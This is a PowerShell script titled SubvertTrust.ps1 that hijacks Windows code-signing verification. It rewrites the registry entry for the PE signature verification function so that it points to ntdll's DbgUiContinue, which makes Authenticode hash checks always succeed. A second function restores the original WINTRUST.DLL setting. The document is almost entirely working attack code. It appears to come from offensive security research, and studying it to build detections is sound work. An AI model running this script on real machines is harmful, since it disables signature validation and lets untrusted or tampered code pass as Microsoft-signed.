Borrowing Microsoft Code Signing Certificates

SubvertTrust.ps1

<#
    SubvertTrust v1.0
    License: GPLv3
    Author: @ConsciousHacker
    Credits: @mattifestation
#>
function SubvertTrust
{
	$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'

	# PE SIP Guids
	#{C689AAB9-8E78-11D0-8C47-00C04FC295EE}
	#{C689AABA-8E78-11D0-8C47-00C04FC295EE}
	$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'

	$PESignatureVerifier = Get-Item -Path "$VerifyHashFunc\$PESIPGuid\"

	# Signed code reuse attack that will effectively return TRUE when the
	# digitial signature hash validation function is called.
	$NewDll = 'C:\Windows\System32\ntdll.dll'
	$NewFuncName = 'DbgUiContinue'
	
	$PESignatureVerifier | Set-ItemProperty -Name Dll -Value $NewDll
	$PESignatureVerifier | Set-ItemProperty -Name FuncName -Value $NewFuncName
}

function RevertTrust
{
	$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'

	# PE SIP Guids
	#{C689AAB9-8E78-11D0-8C47-00C04FC295EE}
	#{C689AABA-8E78-11D0-8C47-00C04FC295EE}
	$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'

	$PESignatureVerifier = Get-Item -Path "$VerifyHashFunc\$PESIPGuid\"

	# Signed code reuse attack that will effectively return TRUE when the
	# digitial signature hash validation function is called.
	$NewDll = 'WINTRUST.DLL'
	$NewFuncName = 'CryptSIPVerifyIndirectData'
	
	$PESignatureVerifier | Set-ItemProperty -Name Dll -Value $NewDll
	$PESignatureVerifier | Set-ItemProperty -Name FuncName -Value $NewFuncName
}

##################
# Start a new process for the hijack to take effect.
# powershell
##################